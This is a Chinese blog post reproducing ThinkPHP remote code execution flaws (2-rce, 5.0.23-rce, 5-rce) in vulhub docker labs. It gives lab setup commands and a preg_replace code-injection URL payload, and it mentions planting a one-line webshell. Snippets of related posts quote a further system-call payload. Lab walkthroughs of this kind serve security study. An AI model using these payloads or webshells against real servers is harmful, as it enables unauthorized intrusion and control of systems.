【vulhub】thinkphp5 2-rce 5.0.23-rce 5-rce 漏洞复现

最新推荐文章于 2024-09-10 14:35:22 发布
最新推荐文章于 2024-09-10 14:35:22 发布
阅读量621 收藏 4
点赞数 13
文章标签: sql 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_75036923/article/details/141992609
版权

2-rec

1.启动环境 

cd /.../vulhub/thinkphp/2-rce  # cd进入2-rce靶场文件环境下
docker-compose up -d          # docker-compose启动靶场
docker ps -a					   # 查看开启的靶场信息

2.访问192.168.146.136:8080网页

3.构造payload

http://192.168.146.136:8080/?s=/Index/index/L/${@phpinfo()}

4.写入一句话木马使用蚁剑链接

 

5.0.23-rce 

1.环境启动

cd vulhub/thinkphp/5.0.23-rce/ #进入漏洞环境所在目录
docker-compose up -d #启动靶场
docker ps #查看容器信息

2.访问192.168.146.136:8080网页

3.进行远程命令执行

4.访问shell.php,蚁剑连接

 

 5-rce

1.环境启动

cd /vulhub/thinkphp/5-rce #进入漏洞环境所在目录
docker-compose up -d #启动靶场
docker ps #查看容器信息

 

2.访问192.168.146.136:8080网页

 

3.寻找漏洞点

 

4. 写一句话木马进行链接


 

 

一身傲骨@
关注
  • 13
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[ vulhub漏洞复现篇 ] ThinkPHP 5.0.23-Rce
qq_51577576的博客
10-02 2194
[ vulhub漏洞复现篇 ] ThinkPHP 5.0.23-Rce 漏洞复现 ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞
Thinkphp框架漏洞--->5.0.23 RCE
huohaowen的博客
03-01 1570
本篇文章来讲一下thinkphp的框架漏洞
vulhubthinkphp 2-rce 5.0.23-rce 5-rce in-sqlinjection lang-rce漏洞复现
qq_58873970的博客
09-07 451
----------------梦想,想像力和希望实现这些梦想的人的勇气充满希望。
vulhub thinkphp漏洞复现 | in-sqliniection、2-rce5.0.23-rce、5-rce漏洞复现(详细图解)
鱼溯的博客
02-02 1347
vulhub thinkphp漏洞复现 | in-sqliniection、2-rce5.0.23-rce、5-rce漏洞复现(详细图解)
漏洞复现-thinkphp2-RCE+5.0.23-RCE+5-RCE远程代码执行漏洞
qq_59350385的博客
03-24 652
目录 一、2-RCE 漏洞详情 1.构造poc?s=/a/b/c/${phpinfo()} 2. 使用蚁剑连接地址为: 二、5-RCE 漏洞原因: 1,访问 三、5.0.23-RCE 漏洞原因 1.利用system函数远程命令执行,利用bp抓包,修改请求方式,使用poc进行攻击: 一、2-RCE 漏洞详情 导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞 preg_replace(‘正则规则’,‘替换字符’,‘目标字符’) 如果目标字符存在符合正则规.
vulhub系列之thinkphp(2-rce5.0.23-rce、5-rce、in-sqlinjection)
weixin_43071873的博客
11-24 1668
Thinkphp 2.x 任意代码执行 漏洞详情: ThinkPHP是一个免费开源用户数量非常多的一个PHP开发框架。ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由: KaTeX parse error: Undefined control sequence: \w at position 23: …reg_replace('@(\̲w̲+)'.depr.’([^’.KaTeX parse error: Undefined control sequence: \/ at po
thinkphp漏洞复现】2-RCE+5.0.23-RCE+5-RCE远程代码执行漏洞+in-sqlinjectionSQL注入漏洞
serendipity1130的博客
09-01 1566
参考文章:https://blog.csdn.net/weixin_43071873/article/details/110084577 一、2-RCE 漏洞详情: ThinkPHP是一个免费开源的一个PHP开发框架。ThinkPHP2.x版本中,使用preg_replace的/e模式匹配路由: 导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。 preg_replace(‘正则规则’,‘替换字符’,‘目标字符’) 如果目标字符存在符合正则规则的字符,那么就替换为替换字符,如果此时
Python武器库开发-武器库篇之ThinkPHP 5.0.23-RCE 漏洞复现(六十四)
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
06-23 1236
这里我们使用Kali虚拟机安装docker并搭建vulhub靶场来进行ThinkPHP漏洞环境的安装,我们进入 ThinkPHP漏洞环境,可以 cd ThinkPHP,然后通过 ls 查看可以搭建的靶场,目前 vulhub关于 ThinkPHP漏洞。可以搭建的靶场有五个。然后我们在浏览器输入就可以访问靶场环境。
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析1
08-03
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析 ThinkPHP 是一个流行的 PHP 框架,它提供了许多实用的功能来帮助开发者快速构建 Web 应用程序。然而,在 ThinkPHP 5.0.0 到 5.0.23 版本中存在一个 Remote Code Execution(RCE...
thinkphp/5.0.23-rce漏洞复现
qq_46804551的博客
04-22 944
环境搭建 访问your-ip:8080 环境搭建成功 漏洞复现 thinkphp 5.0.23(完整版)debug模式 32、(post)public/index.php (data)_method=__construct&filter[]=system&server[REQUEST_METHOD]=touch%20/tmp/xxx thinkphp 5.0.23(完整版) 33、(post)public/index.php?s=captcha (data) _method=__co
Thinkphp5.0.23-rce漏洞复现
qq_64875725的博客
06-02 2500
ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。: 'GET';} elseif (!} else {
记录一次vulhub:ThinkPHP5 5.0.23远程代码执行漏洞复现
sszsNo1的博客
06-26 315
复现vulhubThinkPHP5 5.0.23远程代码执行漏洞
pandas读取xlsx文件使用sqlachemy写到数据库
最新发布
ithongchou的博客
09-10 358
如果你使用的是特定的数据库(如 SQLite、PostgreSQL、MySQL),你还需要安装相应的数据库驱动。通过这些步骤,你可以方便地将 Excel 文件中的数据写入数据库。连接字符串的格式取决于你使用的数据库。(用于读取 Excel 文件)。方法将 DataFrame 数据写入数据库。读取 Excel 文件。
【网络安全】空字节绕过:URL回调+XSS+SQL绕WAF
等风来
09-07 349
经过进一步测试,我发现WAF在解析HTTP请求时,如果发现恶意查询,会导致服务器挂起。如果我连续提交3个请求且服务器挂起,它就会阻止我的IP地址。
被低估的SQL
weixin_61431494的博客
09-03 1540
虽然SQL的核心功能强大,但自定义函数和存储过程常常被低估。它们可以封装复杂的业务逻辑,从而提高数据库操作的效率和一致性。存储过程不仅可以接收参数,还能执行多条SQL语句,并处理事务。ASBEGIN-- 可能的其他初始化操作END;这种封装能够保证操作的原子性,同时提升了数据库应用的性能和安全性。
SQL的高级查询练习知识点(day24)
新手小袁
09-05 1156
SQL的高级查询练习知识点,主要关于SQL的练习题,适用于新手练习,主要简述基础查询,条件查询等知识点
基于SSM的文物管理系统(含源码+sql+视频导入教程+文档+PPT)
coderbu的博客
09-06 1307
基于SSM的文物管理系统拥有俩种角色 管理员:个人信息管理、用户管理、分类管理、文物信息管理、文物外借管理、文物维修管理、留言板管理等 用户:登录注册、分类浏览文物信息,留言评论、收藏文物等
postgreSQL 除法运算返回0
日日留心的技术专栏
09-05 330
postgreSQL 进行除法运算,应该使用round+numeric 类型,否则当计算结果小于1 时返回0,大于1 时只返回整数部分.postgreSQL 除法运算返回0。
thinkphp2-rce
07-28
ThinkPHP 2.x版本中存在远程代码执行(RCE漏洞。该漏洞可以通过构造恶意的请求来执行任意的PHP代码。具体来说,漏洞出现在ThinkPHP框架中的路由处理函数中,使用了不安全的preg_replace函数,并且使用了/e模式进行正则表达式匹配。攻击者可以通过在请求中注入恶意的代码来执行任意的PHP代码。这个漏洞ThinkPHP框架的Dispatcher类中的102行被触发。\[2\]\[3\] 为了修复这个漏洞,建议升级到最新版本的ThinkPHP框架,或者手动修复代码中的漏洞。具体修复方法包括使用更安全的正则表达式替代preg_replace函数,并且避免使用/e模式进行正则表达式匹配。此外,还应该对用户输入进行严格的过滤和验证,以防止恶意代码的注入。 #### 引用[.reference_title] - *1* [【漏洞复现】[ThinkPHP]2-Rce](https://blog.csdn.net/Mr_atopos/article/details/124907676)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [ThinkPHP2-RCE漏洞复现](https://blog.csdn.net/qq_51459600/article/details/125179451)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值